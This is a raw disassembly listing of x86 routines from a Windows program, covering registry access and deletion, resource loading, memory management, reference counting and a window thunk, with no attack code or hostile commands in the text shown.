sub_401990 proc near ; CODE XREF: sub_404100+507�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
mov ecx, [esp+4+arg_0]
push 0
push 0
push 0
push 0
push 0
push 0
push 0
lea eax, [esp+20h+var_4]
push eax
push 0
push 0
push 0
push ecx
mov [esp+34h+var_4], 0
call ds:dword_40F014 ; RegQueryInfoKeyA
test eax, eax
jz short loc_4019C7
xor eax, eax
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_4019C7: ; CODE XREF: sub_401990+2F�j
mov eax, [esp+4+var_4]
xor edx, edx
cmp edx, eax
sbb eax, eax
neg eax
pop ecx
retn 4
sub_401990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4019E0 proc near ; CODE XREF: sub_404100+10A�p
; sub_404100+299�p ...
var_1000 = byte ptr -1000h
arg_0 = dword ptr 4
mov eax, 1000h
call __alloca_probe
push esi
push edi
mov edi, [esp+1008h+arg_0]
cmp byte ptr [edi], 3Dh
mov esi, ecx
jnz short loc_401A27
push edi
call sub_401810
test eax, eax
jl short loc_401A29
mov ecx, esi
call sub_4017B0
lea eax, [esp+1008h+var_1000]
push eax
mov ecx, esi
call sub_401810
test eax, eax
jl short loc_401A29
push edi
mov ecx, esi
call sub_401810
test eax, eax
jl short loc_401A29
loc_401A27: ; CODE XREF: sub_4019E0+18�j
xor eax, eax
loc_401A29: ; CODE XREF: sub_4019E0+22�j
; sub_4019E0+39�j ...
pop edi
pop esi
add esp, 1000h
retn 4
sub_4019E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401A40 proc near ; CODE XREF: sub_402A90+86�p
test esi, esi
jnz short loc_401A47
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_401A47: ; CODE XREF: sub_401A40+2�j
cmp word ptr [esi], 0
mov eax, esi
mov ecx, esi
jz short loc_401A76
loc_401A51: ; CODE XREF: sub_401A40+34�j
mov dx, [ecx]
test dx, dx
jz short loc_401A5C
add ecx, 2
loc_401A5C: ; CODE XREF: sub_401A40+17�j
cmp dx, 5Ch
jz short loc_401A6E
cmp dx, 2Fh
jz short loc_401A6E
cmp dx, 3Ah
jnz short loc_401A70
loc_401A6E: ; CODE XREF: sub_401A40+20�j
; sub_401A40+26�j
mov eax, ecx
loc_401A70: ; CODE XREF: sub_401A40+2C�j
cmp word ptr [ecx], 0
jnz short loc_401A51
loc_401A76: ; CODE XREF: sub_401A40+F�j
sub eax, esi
sar eax, 1
retn
sub_401A40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401A80 proc near ; CODE XREF: WinMain(x,x,x,x)+2B�p
arg_0 = dword ptr 4
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short loc_401AAA
mov edx, [eax]
mov dword_4124C4, edx
mov edx, [eax+4]
mov dword_4124C8, edx
mov edx, [eax+8]
mov dword_4124CC, edx
mov eax, [eax+0Ch]
mov dword_4124D0, eax
loc_401AAA: ; CODE XREF: sub_401A80+6�j
push esi
mov esi, [esp+4+arg_0]
cmp esi, 0FFFFFFFFh
jz short loc_401ACF
test esi, esi
mov [ecx+2Ch], esi
jz short loc_401ACF
cmp dword ptr [esi], 0
jz short loc_401ACF
loc_401AC0: ; CODE XREF: sub_401A80+4D�j
push 1
call dword ptr [esi+20h]
mov eax, [esi+24h]
add esi, 24h
test eax, eax
jnz short loc_401AC0
loc_401ACF: ; CODE XREF: sub_401A80+32�j
; sub_401A80+39�j ...
mov esi, off_412548
cmp esi, off_41254C
jnb short loc_401AF7
lea ecx, [ecx+0]
loc_401AE0: ; CODE XREF: sub_401A80+75�j
mov eax, [esi]
test eax, eax
jz short loc_401AEB
push 1
call dword ptr [eax+20h]
loc_401AEB: ; CODE XREF: sub_401A80+64�j
mov eax, off_41254C
add esi, 4
cmp esi, eax
jb short loc_401AE0
loc_401AF7: ; CODE XREF: sub_401A80+5B�j
xor eax, eax
pop esi
retn 0Ch
sub_401A80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B00 proc near ; CODE XREF: sub_402210+84�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jnz short loc_401B12
mov eax, 80070057h
pop edi
retn 0Ch
; ---------------------------------------------------------------------------
loc_401B12: ; CODE XREF: sub_401B00+7�j
mov ecx, [edi+0Ch]
push esi
mov esi, [edi+8]
cmp esi, ecx
mov eax, 1
jnb short loc_401B4E
push ebx
mov ebx, [esp+0Ch+arg_8]
push ebp
mov ebp, [esp+10h+arg_4]
lea esp, [esp+0]
loc_401B30: ; CODE XREF: sub_401B00+4A�j
test eax, eax
jl short loc_401B4C
mov ecx, [esi]
test ecx, ecx
jz short loc_401B42
push ebx
push ebp
push ecx
call sub_401420
loc_401B42: ; CODE XREF: sub_401B00+38�j
mov ecx, [edi+0Ch]
add esi, 4
cmp esi, ecx
jb short loc_401B30
loc_401B4C: ; CODE XREF: sub_401B00+32�j
pop ebp
pop ebx
loc_401B4E: ; CODE XREF: sub_401B00+20�j
pop esi
pop edi
retn 0Ch
sub_401B00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401B60 proc near ; CODE XREF: sub_4022A0+37�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jnz short loc_401B72
mov eax, 80070057h
pop edi
retn 4
; ---------------------------------------------------------------------------
loc_401B72: ; CODE XREF: sub_401B60+7�j
mov ecx, [edi+0Ch]
push esi
mov esi, [edi+8]
xor eax, eax
cmp esi, ecx
jnb short loc_401BA5
push ebx
mov ebx, ds:dword_40F264
loc_401B86: ; CODE XREF: sub_401B60+42�j
test eax, eax
jnz short loc_401BA4
mov ecx, [esi]
test ecx, ecx
jz short loc_401B9A
mov eax, [ecx+14h]
test eax, eax
jz short loc_401B9A
push eax
call ebx
loc_401B9A: ; CODE XREF: sub_401B60+2E�j
; sub_401B60+35�j
mov ecx, [edi+0Ch]
add esi, 4
cmp esi, ecx
jb short loc_401B86
loc_401BA4: ; CODE XREF: sub_401B60+28�j
pop ebx
loc_401BA5: ; CODE XREF: sub_401B60+1D�j
pop esi
pop edi
retn 4
sub_401B60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401BB0 proc near ; CODE XREF: sub_402170+6A�p
; sub_403050+16�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
test ebx, ebx
jnz short loc_401BC8
push ebx
push ebx
push 1
push 0C0000005h
call ds:dword_40F044 ; RaiseException
loc_401BC8: ; CODE XREF: sub_401BB0+7�j
push esi
mov esi, [ebx+8]
test esi, esi
jz short loc_401BEA
push edi
loc_401BD1: ; CODE XREF: sub_401BB0+37�j
mov eax, [esi+4]
push eax
call dword ptr [esi]
mov edi, [esi+8]
push esi ; Memory
call j__free
add esp, 4
test edi, edi
mov esi, edi
jnz short loc_401BD1
pop edi
loc_401BEA: ; CODE XREF: sub_401BB0+1E�j
pop esi
mov dword ptr [ebx+8], 0
pop ebx
retn 4
sub_401BB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C00 proc near ; CODE XREF: .text:00404B71�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
mov eax, [esi+0Ch]
test eax, eax
jnz short loc_401C1E
push 0Dh
push 4
call ds:dword_40F07C ; GetProcessHeap
push eax
call ds:dword_40F080 ; RtlAllocateHeap
mov [esi+0Ch], eax
loc_401C1E: ; CODE XREF: sub_401C00+8�j
mov eax, [esi+0Ch]
mov edx, [esp+4+arg_0]
mov ecx, [esp+4+arg_4]
sub edx, eax
push 0Dh
sub edx, 0Dh
push eax
mov dword ptr [eax], 42444C7h
mov [eax+4], ecx
mov byte ptr [eax+8], 0E9h
mov [eax+9], edx
call ds:dword_40F074 ; GetCurrentProcess
push eax
call ds:dword_40F070 ; FlushInstructionCache
pop esi
retn 8
sub_401C00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C60 proc near ; CODE XREF: sub_401E30+67�p
; sub_401E30+74�p ...
push esi
mov esi, ecx
cmp dword ptr [esi], 0
jz short loc_401C7D
loc_401C68: ; CODE XREF: sub_401C60+1B�j
mov eax, [esi]
mov ecx, [eax]
push eax ; Memory
mov [esi], ecx
call _free
mov eax, [esi]
add esp, 4
test eax, eax
jnz short loc_401C68
loc_401C7D: ; CODE XREF: sub_401C60+6�j
pop esi
retn
sub_401C60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C80 proc near ; CODE XREF: sub_402570+B�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, ecx
mov eax, [edi+8]
xor esi, esi
test eax, eax
jle short loc_401CB7
mov ebx, [esp+10h+arg_0]
mov ebp, ds:dword_40F088
lea esp, [esp+0]
loc_401CA0: ; CODE XREF: sub_401C80+35�j
mov eax, [ebx]
mov ecx, [edi]
mov ecx, [ecx+esi*4]
push eax
push ecx
call ebp ; lstrcmpi
test eax, eax
jz short loc_401CC1
mov eax, [edi+8]
inc esi
cmp esi, eax
jl short loc_401CA0
loc_401CB7: ; CODE XREF: sub_401C80+D�j
pop edi
pop esi
pop ebp
or eax, 0FFFFFFFFh
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_401CC1: ; CODE XREF: sub_401C80+2D�j
pop edi
mov eax, esi
pop esi
pop ebp
pop ebx
retn 4
sub_401C80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401CD0 proc near ; CODE XREF: sub_403D70+EE�p
; sub_403D70+1A8�p ...
mov eax, [ecx]
push eax ; Memory
call _free
pop ecx
retn
sub_401CD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_401CE0(size_t Size)
sub_401CE0 proc near ; CODE XREF: sub_402FD0+F�p
; sub_403000+F�p
Size = dword ptr 4
mov eax, [esp+Size]
push esi
push edi
push eax ; Size
mov edi, ecx
call _malloc
mov esi, eax
add esp, 4
test esi, esi
jnz short loc_401D01
push 8007000Eh
call loc_4012B0
loc_401D01: ; CODE XREF: sub_401CE0+15�j
mov [edi], esi
pop edi
pop esi
retn 4
sub_401CE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D10 proc near ; CODE XREF: sub_4066F0+85D�p
; sub_406FE0+4DF�p ...
push esi
mov esi, ecx
mov eax, [esi+4]
test eax, eax
jz short loc_401D2A
push eax ; Memory
call _free
add esp, 4
mov dword ptr [esi+4], 0
loc_401D2A: ; CODE XREF: sub_401D10+8�j
mov eax, [esi]
push eax
call ds:dword_40F194
pop esi
retn
sub_401D10 endp
; ---------------------------------------------------------------------------
align 10h
loc_401D40: ; DATA XREF: WinMain(x,x,x,x)+10B�o
mov ecx, [esp+4]
call sub_401000
xor eax, eax
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D50 proc near ; DATA XREF: .rdata:0040F598�o
push esi
mov esi, ecx
push edi
lea eax, [esi+8]
push eax
call ds:dword_40F06C ; InterlockedDecrement
mov edi, eax
test edi, edi
jnz short loc_401D72
mov ecx, [esi+34h]
push ecx
mov byte ptr [esi+38h], 1
call ds:dword_40F08C ; SetEvent
loc_401D72: ; CODE XREF: sub_401D50+12�j
mov eax, edi
pop edi
pop esi
retn
sub_401D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D80 proc near ; CODE XREF: sub_402310+42�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
test eax, eax
push esi
mov esi, ecx
jnz short loc_401D91
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_401D91: ; CODE XREF: sub_401D80+B�j
mov edx, [esi]
push edi
lea ecx, [esp+8+arg_0]
push ecx
push eax
push edx
mov [esp+14h+arg_0], 0
call sub_40A570
mov edi, eax
test edi, edi
jl short loc_401DBD
mov eax, [esi]
push eax
call ds:dword_40F194
mov ecx, [esp+8+arg_0]
mov [esi], ecx
loc_401DBD: ; CODE XREF: sub_401D80+2C�j
mov eax, edi
pop edi
pop esi
retn 4
sub_401D80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401DD0 proc near ; CODE XREF: sub_4030B0+29�p
; .text:004031D7�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, ecx
mov eax, [esi]
push edi
push eax
call ds:dword_40F194
mov edi, [esp+0Ch+arg_4]
mov ebx, [esp+0Ch+arg_0]
mov ecx, edi
shr ecx, 4
inc ecx
movzx edx, cx
push 6
push edx
push ebx
mov dword ptr [esi], 0
call ds:dword_40F064 ; FindResourceA
test eax, eax
jz short loc_401E22
push edi
push eax
push ebx
call sub_401380
add esp, 0Ch
test eax, eax
jz short loc_401E22
movzx ecx, word ptr [eax]
push ecx
add eax, 2
push eax
call ds:dword_40F18C
mov [esi], eax
loc_401E22: ; CODE XREF: sub_401DD0+31�j
; sub_401DD0+40�j
mov eax, [esi]
pop edi
test eax, eax
pop esi
setnz al
pop ebx
retn 8
sub_401DD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401E30 proc near ; CODE XREF: sub_402310+1D�p
; sub_403350+22D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push ebp
push esi
mov esi, ecx
mov eax, [esi]
push edi
push eax
mov [esp+18h+var_4], esi
call ds:dword_40F194
mov ebp, [esp+14h+arg_0]
xor edi, edi
cmp ebp, edi
jz short loc_401EAD
call off_412040
push edi
push edi
push 0FFFFFFFFh
push ebp
mov ebx, eax
push edi
push ebx
mov [esp+2Ch+arg_0], edi
call ds:dword_40F038 ; MultiByteToWideChar
mov esi, eax
lea ecx, [esi-1]
push ecx
push edi
call ds:dword_40F18C
mov edi, eax
test edi, edi
jz short loc_401EA0
push esi
push edi
push 0FFFFFFFFh
push ebp
push 0
push ebx
call ds:dword_40F038 ; MultiByteToWideChar
cmp eax, esi
jz short loc_401EA0
push edi
call ds:dword_40F194
lea ecx, [esp+14h+arg_0]
call sub_401C60
xor edi, edi
jmp short loc_401EA9
; ---------------------------------------------------------------------------
loc_401EA0: ; CODE XREF: sub_401E30+48�j
; sub_401E30+5A�j
lea ecx, [esp+14h+arg_0]
call sub_401C60
loc_401EA9: ; CODE XREF: sub_401E30+6E�j
mov esi, [esp+14h+var_4]
loc_401EAD: ; CODE XREF: sub_401E30+1C�j
test edi, edi
mov [esi], edi
jnz short loc_401EC1
test ebp, ebp
jz short loc_401EC1
push 8007000Eh
call loc_4012B0
loc_401EC1: ; CODE XREF: sub_401E30+81�j
; sub_401E30+85�j
pop edi
mov eax, esi
pop esi
pop ebp
pop ebx
pop ecx
retn 4
sub_401E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401ED0 proc near ; CODE XREF: sub_402B60+2B3�p
; sub_402B60+2BB�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_401EE6
push eax
call ds:dword_40F020 ; RegCloseKey
mov dword ptr [esi], 0
loc_401EE6: ; CODE XREF: sub_401ED0+7�j
pop esi
retn
sub_401ED0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EF0 proc near ; CODE XREF: sub_401EF0+AF�p
; sub_404100+E8�p ...
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_100 = byte ptr -100h
arg_0 = dword ptr 4
sub esp, 118h
mov edx, [esp+118h+arg_0]
push esi
push edi
mov edi, ecx
mov eax, [edi]
lea ecx, [esp+120h+var_110]
push ecx
push 2001Fh
push 0
push edx
push eax
mov [esp+134h+var_10C], edi
mov [esp+134h+var_118], 0
mov [esp+134h+var_110], 0
call ds:dword_40F00C ; RegOpenKeyExA
mov ecx, [esp+120h+var_118]
mov esi, eax
test esi, esi
jnz short loc_401F4E
test ecx, ecx
jz short loc_401F40
push ecx
call ds:dword_40F020 ; RegCloseKey
loc_401F40: ; CODE XREF: sub_401EF0+47�j
test eax, eax
mov ecx, [esp+120h+var_110]
mov esi, eax
mov [esp+120h+var_118], ecx
jz short loc_401F6A
loc_401F4E: ; CODE XREF: sub_401EF0+43�j
test ecx, ecx
jz loc_40200D
push ecx
call ds:dword_40F020 ; RegCloseKey
pop edi
mov eax, esi
pop esi
add esp, 118h
retn 4
; ---------------------------------------------------------------------------
loc_401F6A: ; CODE XREF: sub_401EF0+5C�j
mov esi, ds:dword_40F018
lea eax, [esp+120h+var_108]
push eax
push 0
push 0
push 0
lea edx, [esp+130h+var_114]
push edx
lea eax, [esp+134h+var_100]
push eax
push 0
push ecx
mov [esp+140h+var_114], 100h
call esi ; RegEnumKeyExA
test eax, eax
jnz short loc_401FD4
loc_401F96: ; CODE XREF: sub_401EF0+DE�j
lea ecx, [esp+120h+var_100]
push ecx
lea ecx, [esp+124h+var_118]
call sub_401EF0
mov edi, eax
test edi, edi
jnz short loc_40201A
lea edx, [esp+120h+var_108]
push edx
mov edx, [esp+124h+var_118]
push eax
push eax
push eax
lea eax, [esp+130h+var_114]
push eax
lea ecx, [esp+134h+var_100]
push ecx
push edi
push edx
mov [esp+140h+var_114], 100h
call esi ; RegEnumKeyExA
test eax, eax
jz short loc_401F96
mov edi, [esp+120h+var_10C]
loc_401FD4: ; CODE XREF: sub_401EF0+A4�j
mov eax, [esp+120h+var_118]
test eax, eax
jz short loc_401FEB
push eax
call ds:dword_40F020 ; RegCloseKey
mov [esp+120h+var_118], 0
loc_401FEB: ; CODE XREF: sub_401EF0+EA�j
mov eax, [esp+120h+arg_0]
mov ecx, [edi]
push eax
push ecx
call ds:dword_40F008 ; RegDeleteKeyA
mov esi, eax
mov eax, [esp+120h+var_118]
test eax, eax
jz short loc_40200D
push eax
call ds:dword_40F020 ; RegCloseKey
loc_40200D: ; CODE XREF: sub_401EF0+60�j
; sub_401EF0+114�j
pop edi
mov eax, esi
pop esi
add esp, 118h
retn 4
; ---------------------------------------------------------------------------
loc_40201A: ; CODE XREF: sub_401EF0+B8�j
mov eax, [esp+120h+var_118]
test eax, eax
jz short loc_402029
push eax
call ds:dword_40F020 ; RegCloseKey
loc_402029: ; CODE XREF: sub_401EF0+130�j
mov eax, edi
pop edi
pop esi
add esp, 118h
retn 4
sub_401EF0 endp
; ---------------------------------------------------------------------------
align 10h
loc_402040: ; CODE XREF: sub_4020D0+7�p
; sub_4024D0+C�p ...
push esi
mov esi, ecx
mov eax, [esi+8]
push edi
xor edi, edi
test eax, eax
jle short loc_402085
lea ecx, [ecx+0]
loc_402050: ; CODE XREF: .text:00402083�j
test edi, edi
jl short loc_4020BD
cmp edi, [esi+8]
jge short loc_4020BD
mov eax, [esi]
mov ecx, [eax+edi*4]
push ecx
call j_j__free
mov eax, [esi+8]
add esp, 4
cmp edi, eax
jge short loc_4020BD
mov edx, [esi+4]
mov eax, [edx+edi*4]
push eax
call j_j__free
mov eax, [esi+8]
add esp, 4
inc edi
cmp edi, eax
jl short loc_402050
loc_402085: ; CODE XREF: .text:0040204B�j
mov eax, [esi]
test eax, eax
jz short loc_40209A
push eax
call _free
add esp, 4
mov dword ptr [esi], 0
loc_40209A: ; CODE XREF: .text:00402089�j
mov eax, [esi+4]
test eax, eax
jz short loc_4020B1
push eax
call _free
add esp, 4
mov dword ptr [esi+4], 0
loc_4020B1: ; CODE XREF: .text:0040209F�j
pop edi
mov dword ptr [esi+8], 0
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4020BD: ; CODE XREF: .text:00402052�j
; .text:00402057�j ...
push 0
push 0
push 1
push 0C000008Ch
call ds:dword_40F044 ; RaiseException
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4020D0 proc near ; DATA XREF: .rdata:0040F538�o
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
add ecx, 4
call loc_402040
retn 4
sub_4020D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4020E0 proc near ; CODE XREF: sub_40E979+93�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
cmp esi, edi
jz short loc_4020F7
mov eax, [esi]
cmp eax, edi
jz short loc_402157
cmp eax, 2Ch
jz short loc_402101
loc_4020F7: ; CODE XREF: sub_4020E0+A�j
pop edi
mov eax, 80070057h
pop esi
retn 8
; ---------------------------------------------------------------------------
loc_402101: ; CODE XREF: sub_4020E0+15�j
cmp [esi+24h], edi
push ebx
push ebp
jle short loc_402130
mov ebx, [esp+10h+arg_4]
mov ebp, ds:dword_40F224
loc_402112: ; CODE XREF: sub_4020E0+4C�j
test edi, edi
jl short loc_40215E
cmp edi, [esi+24h]
jge short loc_40215E
mov eax, [esi+20h]
movzx ecx, word ptr [eax+edi*2]
push ebx
push ecx
call ebp ; UnregisterClassA
mov eax, [esi+24h]
inc edi
cmp edi, eax
jl short loc_402112
xor edi, edi
loc_402130: ; CODE XREF: sub_4020E0+26�j
mov eax, [esi+20h]
cmp eax, edi
jz short loc_402143
push eax ; Memory
call _free
add esp, 4
mov [esi+20h], edi
loc_402143: ; CODE XREF: sub_4020E0+55�j
lea edx, [esi+4]
push edx
mov [esi+24h], edi
mov [esi+28h], edi
call ds:dword_40F054 ; RtlDeleteCriticalSection
pop ebp
mov [esi], edi
pop ebx
loc_402157: ; CODE XREF: sub_4020E0+10�j
pop edi
xor eax, eax
pop esi
retn 8
; ---------------------------------------------------------------------------
loc_40215E: ; CODE XREF: sub_4020E0+34�j
; sub_4020E0+39�j
push 0
push 0
push 1
push 0C000008Ch
call ds:dword_40F044 ; RaiseException
int 3 ; Trap to Debugger
sub_4020E0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402170 proc near ; CODE XREF: WinMain(x,x,x,x)+268�p
push esi
push edi
mov edi, ecx
mov esi, [edi+2Ch]
test esi, esi
jz short loc_4021A3
cmp dword ptr [esi], 0
jz short loc_4021A3
loc_402180: ; CODE XREF: sub_402170+31�j
mov eax, [esi+10h]
test eax, eax
jz short loc_40218D
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40218D: ; CODE XREF: sub_402170+15�j
push 0
mov dword ptr [esi+10h], 0
call dword ptr [esi+20h]
mov eax, [esi+24h]
add esi, 24h
test eax, eax
jnz short loc_402180
loc_4021A3: ; CODE XREF: sub_402170+9�j
; sub_402170+E�j
mov esi, off_412548
cmp esi, off_41254C
jnb short loc_4021C8
loc_4021B1: ; CODE XREF: sub_402170+56�j
mov eax, [esi]
test eax, eax
jz short loc_4021BC
push 0
call dword ptr [eax+20h]
loc_4021BC: ; CODE XREF: sub_402170+45�j
mov eax, off_41254C
add esi, 4
cmp esi, eax
jb short loc_4021B1
loc_4021C8: ; CODE XREF: sub_402170+3F�j
mov eax, [edi+4]
test eax, eax
lea esi, [edi+4]
jz short loc_402203
mov eax, [edi+0Ch]
test eax, eax
jz short loc_4021E6
push esi
call sub_401BB0
mov dword ptr [edi+0Ch], 0
loc_4021E6: ; CODE XREF: sub_402170+67�j
mov eax, [edi+28h]
test eax, eax
jz short loc_4021F3
mov edx, [eax]
push eax
call dword ptr [edx+8]
loc_4021F3: ; CODE XREF: sub_402170+7B�j
add edi, 10h
push edi
call ds:dword_40F054 ; RtlDeleteCriticalSection
mov dword ptr [esi], 0
loc_402203: ; CODE XREF: sub_402170+60�j
pop edi
pop esi
retn
sub_402170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402210 proc near ; CODE XREF: WinMain(x,x,x,x)+123�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebp
push esi
mov esi, [ecx+2Ch]
xor eax, eax
test esi, esi
push edi
jz short loc_402285
cmp dword ptr [esi], 0
jz short loc_402285
mov ebp, ds:dword_40F27C
loc_402228: ; CODE XREF: sub_402210+6F�j
test eax, eax
jnz short loc_402299
mov [esp+10h+var_4], eax
mov eax, [esi+8]
test eax, eax
jz short loc_402277
mov edx, [esi+0Ch]
lea ecx, [esp+10h+var_4]
push ecx
push offset dword_40F3CC
push edx
call eax
mov edi, eax
test edi, edi
jl short loc_402267
mov ecx, [esp+10h+arg_4]
mov edx, [esp+10h+arg_0]
lea eax, [esi+14h]
push eax
mov eax, [esp+14h+var_4]
push ecx
mov ecx, [esi]
push edx
push eax
push ecx
call ebp
mov edi, eax
loc_402267: ; CODE XREF: sub_402210+3B�j
mov eax, [esp+10h+var_4]
test eax, eax
jz short loc_402275
mov edx, [eax]
push eax
call dword ptr [edx+8]
loc_402275: ; CODE XREF: sub_402210+5D�j
mov eax, edi
loc_402277: ; CODE XREF: sub_402210+25�j
mov ecx, [esi+24h]
add esi, 24h
test ecx, ecx
jnz short loc_402228
test eax, eax
jnz short loc_402299
loc_402285: ; CODE XREF: sub_402210+B�j
; sub_402210+10�j
mov eax, [esp+10h+arg_4]
mov ecx, [esp+10h+arg_0]
push eax
push ecx
push offset dword_412540
call sub_401B00
loc_402299: ; CODE XREF: sub_402210+1A�j
; sub_402210+73�j
pop edi
pop esi
pop ebp
pop ecx
retn 8
sub_402210 endp
; =============== S U B R O U T I N E =======================================
sub_4022A0 proc near ; CODE XREF: WinMain(x,x,x,x)+253�p
push esi
mov esi, [ecx+2Ch]
xor eax, eax
test esi, esi
push edi
jz short loc_4022D2
cmp dword ptr [esi], 0
jz short loc_4022D2
mov edi, ds:dword_40F264
loc_4022B6: ; CODE XREF: sub_4022A0+2C�j
test eax, eax
jnz short loc_4022DC
mov eax, [esi+14h]
test eax, eax
jz short loc_4022C4
push eax
call edi
loc_4022C4: ; CODE XREF: sub_4022A0+1F�j
mov ecx, [esi+24h]
add esi, 24h
test ecx, ecx
jnz short loc_4022B6
test eax, eax
jnz short loc_4022DC
loc_4022D2: ; CODE XREF: sub_4022A0+9�j
; sub_4022A0+E�j
push offset dword_412540
call sub_401B60
loc_4022DC: ; CODE XREF: sub_4022A0+18�j
; sub_4022A0+30�j
pop edi
pop esi
retn
sub_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022E0 proc near ; CODE XREF: sub_402730+EA�p
; sub_402730+165�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
add eax, 8
push eax ; Size
mov esi, ecx
call _malloc
add esp, 4
test eax, eax
jnz short loc_4022FB
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4022FB: ; CODE XREF: sub_4022E0+15�j
mov ecx, [esi]
mov [eax], ecx
mov [esi], eax
add eax, 8
pop esi
retn 4
sub_4022E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402310 proc near ; CODE XREF: sub_4030B0+37�p
; .text:004031E5�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
push esi
mov esi, ecx
jnz short loc_40231F
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40231F: ; CODE XREF: sub_402310+9�j
push edi
push eax
lea ecx, [esp+0Ch+arg_0]
mov [esp+0Ch+arg_0], 0
call sub_401E30
mov edi, [esp+8+arg_0]
test edi, edi
jnz short loc_40234B
push edi
call ds:dword_40F194
pop edi
mov eax, 8007000Eh
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40234B: ; CODE XREF: sub_402310+28�j
lea eax, [esp+8+arg_0]
push eax
mov ecx, esi
call sub_401D80
push edi
mov esi, eax
call ds:dword_40F194
pop edi
mov eax, esi
pop esi
retn 4
sub_402310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402370 proc near ; DATA XREF: .rdata:0040F594�o
add ecx, 8
push ecx
call ds:dword_40F098 ; InterlockedIncrement
retn
sub_402370 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402380 proc near ; DATA XREF: .rdata:0040F59C�o
mov eax, [ecx+8]
retn
sub_402380 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402390 proc near ; DATA XREF: .rdata:0040F5A0�o
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
test ebx, ebx
jnz short loc_4023A2
mov eax, 80004003h
pop ebx
retn 4
; ---------------------------------------------------------------------------
loc_4023A2: ; CODE XREF: sub_402390+7�j
mov eax, [ecx+28h]
push esi
lea esi, [ecx+28h]
push edi
xor edi, edi
test eax, eax
jnz short loc_4023CA
push esi
push offset dword_40F508
push 1
push edi
push offset dword_40F39C
call ds:dword_40F26C
mov edi, eax
test edi, edi
jl short loc_4023D6
loc_4023CA: ; CODE XREF: sub_402390+1E�j
mov eax, [esi]
mov [ebx], eax
mov esi, [esi]
mov ecx, [esi]
push esi
call dword ptr [ecx+4]
loc_4023D6: ; CODE XREF: sub_402390+38�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 4
sub_402390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4023E0 proc near ; DATA XREF: .rdata:0040F5A8�o
; .rdata:0040F5AC�o
mov eax, 80004005h
retn 10h
sub_4023E0 endp
; ---------------------------------------------------------------------------
